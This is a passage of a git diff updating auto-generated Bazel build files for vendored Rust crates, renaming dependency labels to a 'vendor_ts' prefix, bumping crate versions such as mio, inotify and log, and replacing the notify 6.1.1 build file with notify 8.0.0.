@@ -85,7 +85,7 @@ rust_library( }), version = "2.7.0", deps = [ - "@vendor__equivalent-1.0.1//:equivalent", - "@vendor__hashbrown-0.15.2//:hashbrown", + "@vendor_ts__equivalent-1.0.1//:equivalent", + "@vendor_ts__hashbrown-0.15.2//:hashbrown", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.inotify-0.9.6.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.inotify-0.11.0.bazel similarity index 95% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.inotify-0.9.6.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.inotify-0.11.0.bazel index 9b8089c8bb81..8abc71e58117 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.inotify-0.9.6.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.inotify-0.11.0.bazel @@ -79,10 +79,10 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.9.6", + version = "0.11.0", deps = [ - "@vendor__bitflags-1.3.2//:bitflags", - "@vendor__inotify-sys-0.1.5//:inotify_sys", - "@vendor__libc-0.2.169//:libc", + "@vendor_ts__bitflags-2.8.0//:bitflags", + "@vendor_ts__inotify-sys-0.1.5//:inotify_sys", + "@vendor_ts__libc-0.2.169//:libc", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.inotify-sys-0.1.5.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.inotify-sys-0.1.5.bazel index c31f00f36823..3e23ee4dea6f 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.inotify-sys-0.1.5.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.inotify-sys-0.1.5.bazel @@ -81,6 +81,6 @@ rust_library( }), version = "0.1.5", deps = [ - "@vendor__libc-0.2.169//:libc", + "@vendor_ts__libc-0.2.169//:libc", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.itertools-0.12.1.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.itertools-0.12.1.bazel index 6fd6eb800b46..e9f3a3532d3a 100644 
--- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.itertools-0.12.1.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.itertools-0.12.1.bazel @@ -86,6 +86,6 @@ rust_library( }), version = "0.12.1", deps = [ - "@vendor__either-1.13.0//:either", + "@vendor_ts__either-1.14.0//:either", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.itertools-0.14.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.itertools-0.14.0.bazel index 6c9dac8660ef..020cdf4b9dad 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.itertools-0.14.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.itertools-0.14.0.bazel @@ -86,6 +86,6 @@ rust_library( }), version = "0.14.0", deps = [ - "@vendor__either-1.13.0//:either", + "@vendor_ts__either-1.14.0//:either", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.js-sys-0.3.76.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.js-sys-0.3.76.bazel index 07a7873c5c15..c4c245329262 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.js-sys-0.3.76.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.js-sys-0.3.76.bazel @@ -85,7 +85,7 @@ rust_library( }), version = "0.3.76", deps = [ - "@vendor__once_cell-1.20.2//:once_cell", - "@vendor__wasm-bindgen-0.2.99//:wasm_bindgen", + "@vendor_ts__once_cell-1.20.3//:once_cell", + "@vendor_ts__wasm-bindgen-0.2.99//:wasm_bindgen", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.kqueue-1.0.8.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.kqueue-1.0.8.bazel index 90ebace5cef3..25390d540e0e 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.kqueue-1.0.8.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.kqueue-1.0.8.bazel 
@@ -81,7 +81,7 @@ rust_library( }), version = "1.0.8", deps = [ - "@vendor__kqueue-sys-1.0.4//:kqueue_sys", - "@vendor__libc-0.2.169//:libc", + "@vendor_ts__kqueue-sys-1.0.4//:kqueue_sys", + "@vendor_ts__libc-0.2.169//:libc", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.kqueue-sys-1.0.4.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.kqueue-sys-1.0.4.bazel index 16504b28cb82..e226e4b77c7f 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.kqueue-sys-1.0.4.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.kqueue-sys-1.0.4.bazel @@ -81,7 +81,7 @@ rust_library( }), version = "1.0.4", deps = [ - "@vendor__bitflags-1.3.2//:bitflags", - "@vendor__libc-0.2.169//:libc", + "@vendor_ts__bitflags-1.3.2//:bitflags", + "@vendor_ts__libc-0.2.169//:libc", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.libc-0.2.169.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.libc-0.2.169.bazel index 4c96b7c5dc95..d3cef09f0cd8 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.libc-0.2.169.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.libc-0.2.169.bazel @@ -86,7 +86,7 @@ rust_library( }), version = "0.2.169", deps = [ - "@vendor__libc-0.2.169//:build_script_build", + "@vendor_ts__libc-0.2.169//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.libredox-0.1.3.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.libredox-0.1.3.bazel index f13d15a95e10..4bbbe82982c5 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.libredox-0.1.3.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.libredox-0.1.3.bazel 
@@ -81,8 +81,8 @@ rust_library( }), version = "0.1.3", deps = [ - "@vendor__bitflags-2.7.0//:bitflags", - "@vendor__libc-0.2.169//:libc", - "@vendor__redox_syscall-0.5.8//:syscall", + "@vendor_ts__bitflags-2.8.0//:bitflags", + "@vendor_ts__libc-0.2.169//:libc", + "@vendor_ts__redox_syscall-0.5.8//:syscall", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.line-index-0.1.2.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.line-index-0.1.2.bazel index 2e36a7d3ab24..0606a147a5cb 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.line-index-0.1.2.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.line-index-0.1.2.bazel @@ -81,7 +81,7 @@ rust_library( }), version = "0.1.2", deps = [ - "@vendor__nohash-hasher-0.2.0//:nohash_hasher", - "@vendor__text-size-1.1.1//:text_size", + "@vendor_ts__nohash-hasher-0.2.0//:nohash_hasher", + "@vendor_ts__text-size-1.1.1//:text_size", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.lock_api-0.4.12.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.lock_api-0.4.12.bazel index 7998bc5361fa..3044c1276928 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.lock_api-0.4.12.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.lock_api-0.4.12.bazel @@ -86,8 +86,8 @@ rust_library( }), version = "0.4.12", deps = [ - "@vendor__lock_api-0.4.12//:build_script_build", - "@vendor__scopeguard-1.2.0//:scopeguard", + "@vendor_ts__lock_api-0.4.12//:build_script_build", + "@vendor_ts__scopeguard-1.2.0//:scopeguard", ], ) @@ -143,7 +143,7 @@ cargo_build_script( version = "0.4.12", visibility = ["//visibility:private"], deps = [ - "@vendor__autocfg-1.4.0//:autocfg", + "@vendor_ts__autocfg-1.4.0//:autocfg", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.log-0.3.9.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.log-0.3.9.bazel index 5c06b96e63fe..c17f4cad96b1 100644 
--- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.log-0.3.9.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.log-0.3.9.bazel @@ -85,6 +85,6 @@ rust_library( }), version = "0.3.9", deps = [ - "@vendor__log-0.4.22//:log", + "@vendor_ts__log-0.4.25//:log", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.log-0.4.22.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.log-0.4.25.bazel similarity index 99% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.log-0.4.22.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.log-0.4.25.bazel index 74a985fb2ee4..a2e0e15b13ef 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.log-0.4.22.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.log-0.4.25.bazel @@ -82,5 +82,5 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.4.22", + version = "0.4.25", ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.matchers-0.1.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.matchers-0.1.0.bazel index 792b5181e1dd..90227adce7e5 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.matchers-0.1.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.matchers-0.1.0.bazel @@ -81,6 +81,6 @@ rust_library( }), version = "0.1.0", deps = [ - "@vendor__regex-automata-0.1.10//:regex_automata", + "@vendor_ts__regex-automata-0.1.10//:regex_automata", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.memoffset-0.9.1.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.memoffset-0.9.1.bazel index 7342bcdd53fd..19d3d136021e 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.memoffset-0.9.1.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.memoffset-0.9.1.bazel 
@@ -85,7 +85,7 @@ rust_library( }), version = "0.9.1", deps = [ - "@vendor__memoffset-0.9.1//:build_script_build", + "@vendor_ts__memoffset-0.9.1//:build_script_build", ], ) @@ -140,7 +140,7 @@ cargo_build_script( version = "0.9.1", visibility = ["//visibility:private"], deps = [ - "@vendor__autocfg-1.4.0//:autocfg", + "@vendor_ts__autocfg-1.4.0//:autocfg", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.miniz_oxide-0.8.2.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.miniz_oxide-0.8.5.bazel similarity index 98% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.miniz_oxide-0.8.2.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.miniz_oxide-0.8.5.bazel index 2c0bb16b669f..2d7b2e2a69fc 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.miniz_oxide-0.8.2.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.miniz_oxide-0.8.5.bazel @@ -82,8 +82,8 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.8.2", + version = "0.8.5", deps = [ - "@vendor__adler2-2.0.0//:adler2", + "@vendor_ts__adler2-2.0.0//:adler2", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.mio-0.8.11.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.mio-1.0.3.bazel similarity index 74% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.mio-0.8.11.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.mio-1.0.3.bazel index 8f8955e3a753..617822e3a9ca 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.mio-0.8.11.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.mio-1.0.3.bazel @@ -35,7 +35,7 @@ rust_library( "os-poll", ], crate_root = "src/lib.rs", - edition = "2018", + edition = "2021", rustc_flags = [ "--cap-lints=allow", ], 
@@ -85,94 +85,94 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.8.11", + version = "1.0.3", deps = [ - "@vendor__log-0.4.22//:log", + "@vendor_ts__log-0.4.25//:log", ] + select({ "@rules_rust//rust/platform:aarch64-apple-darwin": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:aarch64-apple-ios": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:aarch64-apple-ios-sim": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:aarch64-linux-android": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [ - "@vendor__windows-sys-0.48.0//:windows_sys", # cfg(windows) + "@vendor_ts__windows-sys-0.52.0//:windows_sys", # cfg(windows) ], "@rules_rust//rust/platform:aarch64-unknown-fuchsia": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:armv7-linux-androideabi": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], 
"@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:i686-apple-darwin": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:i686-linux-android": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:i686-pc-windows-msvc": [ - "@vendor__windows-sys-0.48.0//:windows_sys", # cfg(windows) + "@vendor_ts__windows-sys-0.52.0//:windows_sys", # cfg(windows) ], "@rules_rust//rust/platform:i686-unknown-freebsd": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:i686-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:wasm32-wasip1": [ - "@vendor__libc-0.2.169//:libc", # cfg(target_os = "wasi") - "@vendor__wasi-0.11.0-wasi-snapshot-preview1//:wasi", # cfg(target_os = "wasi") + "@vendor_ts__libc-0.2.169//:libc", # cfg(target_os = "wasi") + "@vendor_ts__wasi-0.11.0-wasi-snapshot-preview1//:wasi", # cfg(target_os = "wasi") ], "@rules_rust//rust/platform:x86_64-apple-darwin": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:x86_64-apple-ios": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:x86_64-linux-android": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + 
"@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [ - "@vendor__windows-sys-0.48.0//:windows_sys", # cfg(windows) + "@vendor_ts__windows-sys-0.52.0//:windows_sys", # cfg(windows) ], "@rules_rust//rust/platform:x86_64-unknown-freebsd": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:x86_64-unknown-fuchsia": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "//conditions:default": [], }), diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.miow-0.6.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.miow-0.6.0.bazel index ff7ceeb231e5..373f357ebb5b 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.miow-0.6.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.miow-0.6.0.bazel @@ -81,6 +81,6 @@ rust_library( }), version = "0.6.0", deps = [ - "@vendor__windows-sys-0.48.0//:windows_sys", + "@vendor_ts__windows-sys-0.48.0//:windows_sys", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.mustache-0.9.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.mustache-0.9.0.bazel index 23106f8a48ce..d21d1c5497c8 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.mustache-0.9.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.mustache-0.9.0.bazel @@ -81,7 +81,7 @@ rust_library( }), version = "0.9.0", deps = [ - "@vendor__log-0.3.9//:log", - "@vendor__serde-1.0.217//:serde", + "@vendor_ts__log-0.3.9//:log", + "@vendor_ts__serde-1.0.218//:serde", ], ) 
diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.notify-6.1.1.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.notify-6.1.1.bazel deleted file mode 100644 index 261a1067fb6e..000000000000 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.notify-6.1.1.bazel +++ /dev/null 
@@ -1,179 +0,0 @@ -############################################################################### -# @generated -# DO NOT MODIFY: This file is auto-generated by a crate_universe tool. To -# regenerate this file, run the following: -# -# bazel run @@//misc/bazel/3rdparty:vendor_tree_sitter_extractors -############################################################################### - -load("@rules_rust//rust:defs.bzl", "rust_library") - -package(default_visibility = ["//visibility:public"]) - -rust_library( - name = "notify", - srcs = glob( - include = ["**/*.rs"], - allow_empty = True, - ), - compile_data = glob( - include = ["**"], - allow_empty = True, - exclude = [ - "**/* *", - ".tmp_git_root/**/*", - "BUILD", - "BUILD.bazel", - "WORKSPACE", - "WORKSPACE.bazel", - ], - ), - crate_features = [ - "crossbeam-channel", - "default", - "fsevent-sys", - "macos_fsevent", - ], - crate_root = "src/lib.rs", - edition = "2021", - rustc_flags = [ - "--cap-lints=allow", - ], - tags = [ - "cargo-bazel", - "crate-name=notify", - "manual", - "noclippy", - "norustfmt", - ], - target_compatible_with = select({ - "@rules_rust//rust/platform:aarch64-apple-darwin": [], - "@rules_rust//rust/platform:aarch64-apple-ios": [], - "@rules_rust//rust/platform:aarch64-apple-ios-sim": [], - "@rules_rust//rust/platform:aarch64-linux-android": [], - "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [], - "@rules_rust//rust/platform:aarch64-unknown-fuchsia": [], - "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [], - "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [], - "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710": [], - "@rules_rust//rust/platform:aarch64-unknown-uefi": [], - "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [], - "@rules_rust//rust/platform:armv7-linux-androideabi": [], - "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [], - "@rules_rust//rust/platform:i686-apple-darwin": [], - "@rules_rust//rust/platform:i686-linux-android": [], - 
"@rules_rust//rust/platform:i686-pc-windows-msvc": [], - "@rules_rust//rust/platform:i686-unknown-freebsd": [], - "@rules_rust//rust/platform:i686-unknown-linux-gnu": [], - "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [], - "@rules_rust//rust/platform:riscv32imc-unknown-none-elf": [], - "@rules_rust//rust/platform:riscv64gc-unknown-none-elf": [], - "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [], - "@rules_rust//rust/platform:thumbv7em-none-eabi": [], - "@rules_rust//rust/platform:thumbv8m.main-none-eabi": [], - "@rules_rust//rust/platform:wasm32-unknown-unknown": [], - "@rules_rust//rust/platform:wasm32-wasip1": [], - "@rules_rust//rust/platform:x86_64-apple-darwin": [], - "@rules_rust//rust/platform:x86_64-apple-ios": [], - "@rules_rust//rust/platform:x86_64-linux-android": [], - "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [], - "@rules_rust//rust/platform:x86_64-unknown-freebsd": [], - "@rules_rust//rust/platform:x86_64-unknown-fuchsia": [], - "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [], - "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [], - "@rules_rust//rust/platform:x86_64-unknown-none": [], - "@rules_rust//rust/platform:x86_64-unknown-uefi": [], - "//conditions:default": ["@platforms//:incompatible"], - }), - version = "6.1.1", - deps = [ - "@vendor__crossbeam-channel-0.5.14//:crossbeam_channel", - "@vendor__filetime-0.2.25//:filetime", - "@vendor__libc-0.2.169//:libc", - "@vendor__log-0.4.22//:log", - "@vendor__walkdir-2.5.0//:walkdir", - ] + select({ - "@rules_rust//rust/platform:aarch64-apple-darwin": [ - "@vendor__bitflags-2.7.0//:bitflags", # cfg(target_os = "macos") - "@vendor__fsevent-sys-4.1.0//:fsevent_sys", # aarch64-apple-darwin - ], - "@rules_rust//rust/platform:aarch64-linux-android": [ - "@vendor__inotify-0.9.6//:inotify", # cfg(any(target_os = "linux", target_os = "android")) - "@vendor__mio-0.8.11//:mio", # cfg(any(target_os = "linux", target_os = "android")) - ], - 
"@rules_rust//rust/platform:aarch64-pc-windows-msvc": [ - "@vendor__windows-sys-0.48.0//:windows_sys", # cfg(windows) - ], - "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [ - "@vendor__inotify-0.9.6//:inotify", # cfg(any(target_os = "linux", target_os = "android")) - "@vendor__mio-0.8.11//:mio", # cfg(any(target_os = "linux", target_os = "android")) - ], - "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [ - "@vendor__inotify-0.9.6//:inotify", # cfg(any(target_os = "linux", target_os = "android")) - "@vendor__mio-0.8.11//:mio", # cfg(any(target_os = "linux", target_os = "android")) - ], - "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [ - "@vendor__inotify-0.9.6//:inotify", # cfg(any(target_os = "linux", target_os = "android")) - "@vendor__mio-0.8.11//:mio", # cfg(any(target_os = "linux", target_os = "android")) - ], - "@rules_rust//rust/platform:armv7-linux-androideabi": [ - "@vendor__inotify-0.9.6//:inotify", # cfg(any(target_os = "linux", target_os = "android")) - "@vendor__mio-0.8.11//:mio", # cfg(any(target_os = "linux", target_os = "android")) - ], - "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [ - "@vendor__inotify-0.9.6//:inotify", # cfg(any(target_os = "linux", target_os = "android")) - "@vendor__mio-0.8.11//:mio", # cfg(any(target_os = "linux", target_os = "android")) - ], - "@rules_rust//rust/platform:i686-apple-darwin": [ - "@vendor__bitflags-2.7.0//:bitflags", # cfg(target_os = "macos") - "@vendor__fsevent-sys-4.1.0//:fsevent_sys", # i686-apple-darwin - ], - "@rules_rust//rust/platform:i686-linux-android": [ - "@vendor__inotify-0.9.6//:inotify", # cfg(any(target_os = "linux", target_os = "android")) - "@vendor__mio-0.8.11//:mio", # cfg(any(target_os = "linux", target_os = "android")) - ], - "@rules_rust//rust/platform:i686-pc-windows-msvc": [ - "@vendor__windows-sys-0.48.0//:windows_sys", # cfg(windows) - ], - "@rules_rust//rust/platform:i686-unknown-freebsd": [ - "@vendor__kqueue-1.0.8//:kqueue", # 
cfg(any(target_os = "freebsd", target_os = "openbsd", target_os = "netbsd", target_os = "dragonflybsd")) - "@vendor__mio-0.8.11//:mio", # cfg(any(target_os = "freebsd", target_os = "openbsd", target_os = "netbsd", target_os = "dragonflybsd")) - ], - "@rules_rust//rust/platform:i686-unknown-linux-gnu": [ - "@vendor__inotify-0.9.6//:inotify", # cfg(any(target_os = "linux", target_os = "android")) - "@vendor__mio-0.8.11//:mio", # cfg(any(target_os = "linux", target_os = "android")) - ], - "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [ - "@vendor__inotify-0.9.6//:inotify", # cfg(any(target_os = "linux", target_os = "android")) - "@vendor__mio-0.8.11//:mio", # cfg(any(target_os = "linux", target_os = "android")) - ], - "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [ - "@vendor__inotify-0.9.6//:inotify", # cfg(any(target_os = "linux", target_os = "android")) - "@vendor__mio-0.8.11//:mio", # cfg(any(target_os = "linux", target_os = "android")) - ], - "@rules_rust//rust/platform:x86_64-apple-darwin": [ - "@vendor__bitflags-2.7.0//:bitflags", # cfg(target_os = "macos") - "@vendor__fsevent-sys-4.1.0//:fsevent_sys", # x86_64-apple-darwin - ], - "@rules_rust//rust/platform:x86_64-linux-android": [ - "@vendor__inotify-0.9.6//:inotify", # cfg(any(target_os = "linux", target_os = "android")) - "@vendor__mio-0.8.11//:mio", # cfg(any(target_os = "linux", target_os = "android")) - ], - "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [ - "@vendor__windows-sys-0.48.0//:windows_sys", # cfg(windows) - ], - "@rules_rust//rust/platform:x86_64-unknown-freebsd": [ - "@vendor__kqueue-1.0.8//:kqueue", # cfg(any(target_os = "freebsd", target_os = "openbsd", target_os = "netbsd", target_os = "dragonflybsd")) - "@vendor__mio-0.8.11//:mio", # cfg(any(target_os = "freebsd", target_os = "openbsd", target_os = "netbsd", target_os = "dragonflybsd")) - ], - "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [ - "@vendor__inotify-0.9.6//:inotify", # cfg(any(target_os = 
"linux", target_os = "android")) - "@vendor__mio-0.8.11//:mio", # cfg(any(target_os = "linux", target_os = "android")) - ], - "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [ - "@vendor__inotify-0.9.6//:inotify", # cfg(any(target_os = "linux", target_os = "android")) - "@vendor__mio-0.8.11//:mio", # cfg(any(target_os = "linux", target_os = "android")) - ], - "//conditions:default": [], - }), -) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.notify-8.0.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.notify-8.0.0.bazel new file mode 100644 index 000000000000..43a411a44ef6 --- /dev/null +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.notify-8.0.0.bazel 
